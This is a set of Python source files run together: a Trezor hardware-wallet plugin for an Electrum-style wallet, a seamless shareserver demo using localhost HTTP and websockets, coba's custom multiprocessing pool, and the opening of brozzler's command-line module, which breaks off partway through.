def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
from . import client
from . import transport
import trezorlib.messages
self.client_class = client.TrezorClient
self.types = trezorlib.messages
self.DEVICE_IDS = ('TREZOR',)
self.transport_handler = transport.TrezorTransport()
self.device_manager().register_enumerate_func(self.enumerate)
def get_library_version(self):
import trezorlib
try:
return trezorlib.__version__
except AttributeError:
return 'unknown'
def enumerate(self):
devices = self.transport_handler.enumerate_devices()
return [Device(d.get_path(), -1, d.get_path(), 'TREZOR', 0) for d in devices]
def create_client(self, device, handler):
try:
self.print_error("connecting to device at", device.path)
transport = self.transport_handler.get_transport(device.path)
except BaseException as e:
self.print_error("cannot connect at", device.path, str(e))
return None
if not transport:
self.print_error("cannot connect at", device.path)
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
if handler:
handler.show_error(msg)
else:
raise Exception(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Bitcored"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
model = client.get_trezor_model()
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, model)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
traceback.print_exc(file=sys.stderr)
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection, recovery_type = settings
if method == TIM_RECOVER and recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
if recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS:
recovery_type_trezor = self.types.RecoveryDeviceType.ScrambledWords
else:
recovery_type_trezor = self.types.RecoveryDeviceType.Matrix
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language,
type=recovery_type_trezor)
if recovery_type == RECOVERY_TYPE_MATRIX:
handler.close_matrix_dialog()
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
_, depth, fingerprint, child_num, chain_code, key = deserialize_xpub(xpub)
node = self.types.HDNodeType(
depth=depth,
fingerprint=int.from_bytes(fingerprint, 'big'),
child_num=int.from_bytes(child_num, 'big'),
chain_code=chain_code,
public_key=key,
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise Exception(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_trezor_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.InputScriptType.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.InputScriptType.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_trezor_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.OutputScriptType.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.OutputScriptType.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_type = self.get_trezor_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
return self._make_node_path(xpub, [change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
script_type = self.get_trezor_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
txinputtype.script_type = self.get_trezor_input_script_type(txin['type'])
else:
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey(0, bfh(x_pubkey))
s = []
return self._make_node_path(xpub, s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=list(map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures'))),
m=txin.get('num_sig'),
)
script_type = self.get_trezor_input_script_type(txin['type'])
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx):
def create_output_by_derivation():
script_type = self.get_trezor_output_script_type(info.script_type)
if len(xpubs) == 1:
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
address_n = self.client_class.expand_path("/%d/%d" % index)
pubkeys = [self._make_node_path(xpub, address_n) for xpub in xpubs]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address is allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t._extend_inputs(inputs)
for vout in d['outputs']:
o = t._add_bin_outputs()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
simple-share.py
|
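# Demonstrates sharing seamless cells through the shareserver: shared cells are read and
# written over HTTP (GET/PUT with a JSON "buffer" payload) while change notifications are
# received over a websocket connection.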
import seamless
from seamless.core import macro_mode_on
from seamless.core import context, cell, transformer, unilink, macro
from seamless.shareserver import shareserver
from seamless.core.share import sharemanager
from functools import partial
import websockets
import requests
import asyncio
import json
import time
shareserver_started = shareserver.start()
def define_ctx():
with macro_mode_on():
ctx = context(toplevel=True)
ctx.cell1 = cell().set(1)
ctx.cell2 = cell().set(2)
ctx.compute()
with macro_mode_on():
ctx.result = cell()
ctx.tf = transformer({
"a": "input",
"b": "input",
"c": "output"
})
ctx.cell1_unilink = unilink(ctx.cell1)
ctx.cell1_unilink.connect(ctx.tf.a)
ctx.cell2.connect(ctx.tf.b)
ctx.code = cell("transformer").set("c = a + b")
ctx.code.connect(ctx.tf.code)
ctx.result_unilink = unilink(ctx.result)
ctx.tf.c.connect(ctx.result_unilink)
return ctx
ctx = define_ctx()
ctx.compute()
name = sharemanager.new_namespace(ctx._get_manager(), True, name="ctx")
ctx.compute()
print("OK1", name)
print(ctx.cell1.value, ctx.cell2.value)
ctx.cell1.share(readonly=False)
ctx.cell2.share(readonly=False)
ctx.compute()
async def echo(uri):
async with websockets.connect(uri) as websocket:
async for message in websocket:
print("WS ECHO", message)
ws = echo('ws://localhost:5138/ctx')
asyncio.ensure_future(ws)
loop = asyncio.get_event_loop()
loop.run_until_complete(shareserver_started)
loop.run_until_complete(asyncio.sleep(0.1))
def thread(func, *args, **kwargs):
from threading import Thread
from queue import Queue
def func2(func, q, args, kwargs):
result = func(*args, **kwargs)
q.put(result)
q = Queue()
t = Thread(target=func2, args=(func, q, args, kwargs))
t.start()
while t.is_alive():
t.join(0.05)
loop.run_until_complete(asyncio.sleep(0.01))
return q.get()
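# thread() runs a blocking call (here: requests) in a worker thread while periodically
# pumping the asyncio event loop, so the shareserver keeps serving during the HTTP round-trip.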
r = thread(requests.get, 'http://localhost:5813/ctx/cell1')
print(r.json())
r = thread(
requests.put, 'http://localhost:5813/ctx/cell1',
data=json.dumps({"buffer": "20\n"})
)
r = thread(requests.get, 'http://localhost:5813/ctx/cell1')
print(r.json())
ctx.cell1.set(99)
loop.run_until_complete(asyncio.sleep(0.1))
r = thread(requests.get, 'http://localhost:5813/ctx/cell1')
print(r.json())
ctx._get_manager().destroy()
ctx = context(toplevel=True)
name = sharemanager.new_namespace(ctx._get_manager(), True, name="ctx")
print("OK2", name)
assert name == "ctx"
ws = echo('ws://localhost:5138/ctx')
asyncio.ensure_future(ws)
def macro_code(ctx, param_a):
ctx.a = cell().set(param_a + 1000)
ctx.a.share()
ctx.a0 = cell().set(999)
ctx.a0.share()
def define_ctx2():
ctx.macro = macro({"param_a": "int"})
ctx.macro.code.cell().set(macro_code)
ctx.param_a = cell().set(42)
ctx.param_a.share(readonly=False)
ctx.param_a.connect(ctx.macro.param_a)
define_ctx2()
import asyncio; asyncio.get_event_loop().run_until_complete(asyncio.ensure_future(asyncio.sleep(1)))
r = thread(
requests.patch, 'http://localhost:5813/ctx/compute',
json={"timeout": None}
)
print(r.text)
print(ctx.param_a.value)
print(ctx.macro.ctx.a.value)
r = thread(requests.get, 'http://localhost:5813/ctx/macro/ctx/a')
print(r.json())
print("OK3")
r = thread(
requests.put, 'http://localhost:5813/ctx/param_a',
data=json.dumps({"buffer": "43\n"})
)
print(r.json())
asyncio.get_event_loop().run_until_complete(asyncio.sleep(0.5)) # to get the request processed
print("OK3a")
ctx.compute()
print(ctx.param_a.value)
print("OK3b")
ctx.compute()
print(ctx.param_a.value)
print(ctx.macro.ctx.a.value)
|
multiprocessing.py
|
import time
import traceback
import pickle
import inspect
import collections.abc
from itertools import islice
from threading import Thread
from multiprocessing import current_process, Process, Queue
from typing import Iterable, Any, List, Optional, Dict
from coba.exceptions import CobaException
from coba.pipes.core import Pipes, Foreach, QueueIO
from coba.pipes.primitives import Filter, Source
from coba.pipes.sinks import Sink, ConsoleSink
# handle not picklable (this is handled by explicitly pickling) (TESTED)
# handle empty list (this is done by PipesPool naturally) (TESTED)
# handle exceptions in process (wrap worker executing code in an exception handler) (TESTED)
# handle ctrl-c without hanging
# > This is done by making PipesPool terminate inside its ContextManager.__exit__
# > This is also done by handling EOFError,BrokenPipeError in QueueIO since ctr-c kills multiprocessing.Pipe
# handle AttributeErrors. This occurs when... (this is handled by PipesPool.worker) (TESTED)
# > a class that is defined in a Jupyter Notebook cell is pickled
# > a class that is defined inside the __name__=='__main__' block is pickled
# handle Experiment.evaluate not being called inside of __name__=='__main__' (this is handled by a big try/catch)
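# Data flow of the pool below: map() pickles each item into _stdin, worker processes unpickle
# and filter them, results are written to _stdout, and exceptions or messages are written to
# _stderr, which is drained into the given stderr sink on a background thread.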
class PipesPool:
# Writing our own multiprocessing pool probably seems a little silly.
# However, Python's multiprocessing.Pool does a very poor job handling errors
# and it often gets stuck in unrecoverable states. Given that this package is
# meant to be used by a general audience who will likely have errors that need
# to be debugged as they learn how to use coba, this was unacceptable. Therefore,
# after countless attempts to make multiprocessing.Pool work, the decision was made
# to write our own so we could add our own helpful error messages.
def __enter__(self) -> 'PipesPool':
return self
def __exit__(self, exc_type, exc_value, traceback) -> None:
if exc_type is None:
self.close()
else:
self.terminate()
def __init__(self, n_processes: int, maxtasksperchild: Optional[int], stderr: Sink):
self._n_processes = n_processes
self._maxtasksperchild = maxtasksperchild or None
self._given_stderr = stderr
self._stdin = None
self._stderr = None
self._stdout = None
def map(self, filter: Filter[Any, Any], items:Iterable[Any]) -> Iterable[Any]:
self._stdin = QueueIO(Queue(maxsize=self._n_processes))
self._stdout = QueueIO(Queue())
self._stderr = QueueIO(Queue())
# Without this multiprocessing.Queue() will output an ugly error message if a user ever hits ctrl-c.
# By setting _ignore_epipe we prevent Queue() from displaying its message and we show our own friendly
# message instead. In future versions of Python this could break but for now this works for 3.6-3.10.
self._stdin ._queue._ignore_epipe = True
self._stdout._queue._ignore_epipe = True
self._stderr._queue._ignore_epipe = True
self._threads = []
self._completed = False
self._terminate = False
self._pool: List[Process] = []
self._no_more_items = False
def maintain_pool():
finished = lambda: self._completed and (self._stdin._queue.qsize() == 0 or self._terminate)
while not finished():
if self._terminate:
break
self._pool = [p for p in self._pool if p.is_alive()]
for _ in range(self._n_processes-len(self._pool)):
args = (filter, self._stdin, self._stdout, self._stderr, self._maxtasksperchild)
process = Process(target=PipesPool.worker, args=args)
process.start()
self._pool.append(process)
#I don't like this but it seems to be
#the fastest/simplest way out of all my tests...
time.sleep(0.1)
if not self._terminate:
for _ in self._pool: self._stdin.write(None)
else:
for p in self._pool: p.terminate()
for p in self._pool: p.join()
self._stderr.write(None)
self._stdout.write(None)
def populate_tasks():
try:
for item in items:
if self._terminate: break
try:
self._stdin.write(pickle.dumps(item))
except Exception as e:
if "pickle" in str(e) or "Pickling" in str(e):
message = str(e) if isinstance(e,CobaException) else (
f"We attempted to process your code on multiple processes but were unable to do so due to a pickle "
f"error. The exact error received was '{str(e)}'. Errors this kind can often be fixed in one of two "
f"ways: 1) evaluate the experiment in question on a single process with no limit on the tasks per child "
f"or 2) modify the named class to be picklable. The easiest way to make a given class picklable is to "
f"add `def __reduce__(self): return (<the class in question>, (<tuple of constructor arguments>))` to "
f"the class. For more information see https://docs.python.org/3/library/pickle.html#object.__reduce__."
)
self._stderr.write(message)
# I'm not sure what I think about this...
# It means pipes stops after a pickle error...
# This is how it has worked for a long time
# So we're leaving it as is for now...
break
else: #pragma: no cover
self._stderr.write((time.time(), current_process().name, e, traceback.format_tb(e.__traceback__)))
except Exception as e:
self._stderr.write((time.time(), current_process().name, e, traceback.format_tb(e.__traceback__)))
self._completed = True
log_thread = Thread(target=Pipes.join(self._stderr, Foreach(self._given_stderr)).run)
log_thread.daemon = True
log_thread.start()
pool_thread = Thread(target=maintain_pool)
pool_thread.daemon = True
pool_thread.start()
tasks_thread = Thread(target=populate_tasks)
tasks_thread.daemon = True
tasks_thread.start()
self._threads.append(log_thread)
self._threads.append(pool_thread)
self._threads.append(tasks_thread)
for item in self._stdout.read():
yield item
def close(self):
while self._threads:
self._threads.pop().join()
if self._stdin : self._stdin._queue .close()
if self._stdout: self._stdout._queue.close()
if self._stderr: self._stderr._queue.close()
def terminate(self):
self._terminate = True
if len(self._threads) > 2:
self._threads[1].join()
@property
def is_terminated(self) -> bool:
return self._terminate
@staticmethod
def worker(filter: Filter[Any,Any], stdin: Source, stdout: Sink, stderr: Sink, maxtasksperchild: Optional[int]):
try:
for item in islice(map(pickle.loads,stdin.read()),maxtasksperchild):
result = filter.filter(item)
#This is a bit of a hack primarily put in place to deal with
#CobaMultiprocessing that performs coba logging of exceptions.
#An alternative solution would be to raise a coba exception
#with the full logging decorators included in the exception message.
if result is None: continue
if inspect.isgenerator(result) or isinstance(result, collections.abc.Iterator):
stdout.write(list(result))
else:
stdout.write(result)
except Exception as e:
if str(e).startswith("Can't get attribute"):
message = (
"We attempted to evaluate your code in multiple processes but we were unable to find all the code "
"definitions needed to pass the tasks to the processes. The two most common causes of this error are: "
"1) a learner or simulation is defined in a Jupyter Notebook cell or 2) a necessary class definition "
"exists inside the `__name__=='__main__'` code block in the main execution script. In either case "
"you can choose one of two simple solutions: 1) evaluate your code in a single process with no limit "
"child tasks or 2) define all necessary classes in a separate file and include the classes via import "
"statements."
)
stderr.write(message)
else:
#WARNING: this will scrub e of its traceback which is why the traceback is also sent as a string
stderr.write((time.time(), current_process().name, e, traceback.format_tb(e.__traceback__)))
except KeyboardInterrupt:
#When ctrl-c is pressed on the keyboard KeyboardInterrupt is raised in each
#process. We need to handle this here because Processor is always run in a
#background process and receives this. We can ignore this because the exception will
#also be raised in our main process. Therefore we simply ignore and trust the main to
#handle the keyboard interrupt correctly.
pass
class Multiprocessor(Filter[Iterable[Any], Iterable[Any]]):
"""Create multiple processes to filter given items."""
def __init__(self,
filter: Filter[Any, Any],
n_processes: int = 1,
maxtasksperchild: int = 0,
stderr: Sink = ConsoleSink(),
chunked: bool = True) -> None:
"""Instantiate a Multiprocessor.
Args:
filter: The inner pipe that will be executed on multiple processes.
n_processes: The number of processes that should be created to filter items.
maxtasksperchild: The number of items a process should filter before being restarted.
stderr: The sink that all errors on background processes will be written to.
chunked: Indicates that the given items have been chunked. Setting this will flatten the return.
"""
self._filter = filter
self._n_processes = n_processes
self._maxtasksperchild = maxtasksperchild
self._stderr = stderr
self._chunked = chunked
def filter(self, items: Iterable[Any]) -> Iterable[Any]:
with PipesPool(self._n_processes, self._maxtasksperchild, self._stderr) as pool:
for item in pool.map(self._filter, items):
if self._chunked:
for inner_item in item:
yield inner_item
else:
yield item
@property
def params(self) -> Dict[str,Any]:
return self._filter.params
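# A minimal usage sketch (the `Double` filter here is hypothetical, for illustration only;
# ordering of results across processes is not guaranteed):
#
#   class Double(Filter):
#       def filter(self, item):
#           return item * 2
#
#   results = list(Multiprocessor(Double(), n_processes=2, chunked=False).filter([1, 2, 3]))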
|
cli.py
|
#!/usr/bin/env python
'''
brozzler/cli.py - brozzler command line executables
Copyright (C) 2014-2019 Internet Archive
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import argparse
import brozzler
import brozzler.worker
import datetime
import json
import logging
import os
import re
import requests
import doublethink
import signal
import string
import sys
import threading
import time
import traceback
import warnings
import yaml
import shutil
import base64
import rethinkdb as r
def add_common_options(arg_parser, argv=None):
argv = argv or sys.argv
arg_parser.add_argument(
'-q', '--quiet', dest='log_level', action='store_const',
default=logging.INFO, const=logging.NOTICE, help='quiet logging')
arg_parser.add_argument(
'-v', '--verbose', dest='log_level', action='store_const',
default=logging.INFO, const=logging.DEBUG, help=(
'verbose logging'))
arg_parser.add_argument(
'--trace', dest='log_level', action='store_const',
default=logging.INFO, const=logging.TRACE, help=(
'very verbose logging'))
# arg_parser.add_argument(
# '-s', '--silent', dest='log_level', action='store_const',
# default=logging.INFO, const=logging.CRITICAL)
arg_parser.add_argument(
'--version', action='version',
version='brozzler %s - %s' % (
brozzler.__version__, os.path.basename(argv[0])))
def add_rethinkdb_options(arg_parser):
arg_parser.add_argument(
'--rethinkdb-servers', dest='rethinkdb_servers',
default=os.environ.get('BROZZLER_RETHINKDB_SERVERS', 'localhost'),
help=(
'rethinkdb servers, e.g. '
'db0.foo.org,db0.foo.org:38015,db1.foo.org (default is the '
'value of environment variable BROZZLER_RETHINKDB_SERVERS)'))
arg_parser.add_argument(
'--rethinkdb-db', dest='rethinkdb_db',
default=os.environ.get('BROZZLER_RETHINKDB_DB', 'brozzler'),
help=(
'rethinkdb database name (default is the value of environment '
'variable BROZZLER_RETHINKDB_DB)'))
def rethinker(args):
servers = args.rethinkdb_servers or 'localhost'
db = args.rethinkdb_db or os.environ.get(
'BROZZLER_RETHINKDB_DB') or 'brozzler'
return doublethink.Rethinker(servers.split(','), db)
def configure_logging(args):
logging.basicConfig(
stream=sys.stderr, level=args.log_level, format=(
'%(asctime)s %(process)d %(levelname)s %(threadName)s '
'%(name)s.%(funcName)s(%(filename)s:%(lineno)d) %(message)s'))
logging.getLogger('requests.packages.urllib3').setLevel(logging.WARN)
warnings.simplefilter(
'ignore', category=requests.packages.urllib3.exceptions.InsecureRequestWarning)
warnings.simplefilter(
'ignore', category=requests.packages.urllib3.exceptions.InsecurePlatformWarning)
def suggest_default_chrome_exe():
# mac os x application executable paths
for path in [
'/Applications/Chromium.app/Contents/MacOS/Chromium',
'/Applications/Google Chrome.app/Contents/MacOS/Google Chrome']:
if os.path.exists(path):
return path
# "chromium-browser" is the executable on ubuntu trusty
# https://github.com/internetarchive/brozzler/pull/6/files uses "chromium"
# google chrome executable names taken from these packages:
# http://www.ubuntuupdates.org/ppa/google_chrome
for exe in [
'chromium-browser', 'chromium', 'google-chrome',
'google-chrome-stable', 'google-chrome-beta',
'google-chrome-unstable']:
if shutil.which(exe):
return exe
return 'chromium-browser'
class BetterArgumentDefaultsHelpFormatter(
argparse.ArgumentDefaultsHelpFormatter):
'''
Like argparse.ArgumentDefaultsHelpFormatter but omits the default value
for arguments with action='store_const'.
'''
def _get_help_string(self, action):
if isinstance(action, argparse._StoreConstAction):
return action.help
else:
return super()._get_help_string(action)
def brozzle_page(argv=None):
'''
Command line utility entry point for brozzling a single page. Opens the url in
a browser, runs some javascript behaviors, and prints outlinks.
'''
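# A sketch of a typical invocation, assuming the brozzle-page entry point is installed:
#   brozzle-page --proxy localhost:8000 --screenshot-full-page https://example.com/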
argv = argv or sys.argv
arg_parser = argparse.ArgumentParser(
prog=os.path.basename(argv[0]),
description='brozzle-page - brozzle a single page',
formatter_class=BetterArgumentDefaultsHelpFormatter)
arg_parser.add_argument('url', metavar='URL', help='page url')
arg_parser.add_argument(
'-e', '--chrome-exe', dest='chrome_exe',
default=suggest_default_chrome_exe(),
help='executable to use to invoke chrome')
arg_parser.add_argument(
'--behavior-parameters', dest='behavior_parameters',
default=None, help=(
'json blob of parameters to populate the javascript behavior '
'template, e.g. {"parameter_username":"x",'
'"parameter_password":"y"}'))
arg_parser.add_argument(
'--username', dest='username', default=None,
help='use this username to try to log in if a login form is found')
arg_parser.add_argument(
'--password', dest='password', default=None,
help='use this password to try to log in if a login form is found')
arg_parser.add_argument(
'--proxy', dest='proxy', default=None, help='http proxy')
arg_parser.add_argument(
'--screenshot-full-page', dest='screenshot_full_page',
action='store_true')
arg_parser.add_argument(
'--skip-extract-outlinks', dest='skip_extract_outlinks',
action='store_true')
arg_parser.add_argument(
'--skip-visit-hashtags', dest='skip_visit_hashtags',
action='store_true')
arg_parser.add_argument(
'--skip-youtube-dl', dest='skip_youtube_dl', action='store_true')
add_common_options(arg_parser, argv)
args = arg_parser.parse_args(args=argv[1:])
configure_logging(args)
brozzler.chrome.check_version(args.chrome_exe)
behavior_parameters = {}
if args.behavior_parameters:
behavior_parameters = json.loads(args.behavior_parameters)
site = brozzler.Site(None, {
'id': -1, 'seed': args.url, 'behavior_parameters': behavior_parameters,
'username': args.username, 'password': args.password})
page = brozzler.Page(None, {'url': args.url, 'site_id': site.id})
worker = brozzler.BrozzlerWorker(
frontier=None, proxy=args.proxy,
skip_extract_outlinks=args.skip_extract_outlinks,
skip_visit_hashtags=args.skip_visit_hashtags,
skip_youtube_dl=args.skip_youtube_dl,
screenshot_full_page=args.screenshot_full_page)
def on_screenshot(screenshot_jpeg):
OK_CHARS = string.ascii_letters + string.digits
filename = '/tmp/{}-{:%Y%m%d%H%M%S}.jpg'.format(
''.join(ch if ch in OK_CHARS else '_' for ch in args.url),
datetime.datetime.now())
with open(filename, 'wb') as f:
f.write(screenshot_jpeg)
logging.info('wrote screenshot to %s', filename)
browser = brozzler.Browser(chrome_exe=args.chrome_exe)
try:
browser.start(proxy=args.proxy)
outlinks = worker.brozzle_page(
browser, site, page, on_screenshot=on_screenshot,
enable_youtube_dl=not args.skip_youtube_dl)
logging.info('outlinks: \n\t%s', '\n\t'.join(sorted(outlinks)))
except brozzler.ReachedLimit as e:
logging.error('reached limit %s', e)
except brozzler.PageInterstitialShown as e:
logging.error('page interstitial shown %s', e)
finally:
browser.stop()
def brozzler_new_job(argv=None):
'''
Command line utility entry point for queuing a new brozzler job. Takes a
yaml brozzler job configuration file, creates job, sites, and pages objects
in rethinkdb, which brozzler-workers will look at and start crawling.
'''
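# Illustrative invocation (hypothetical job-conf file name):
#   brozzler-new-job ./myjob.yml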
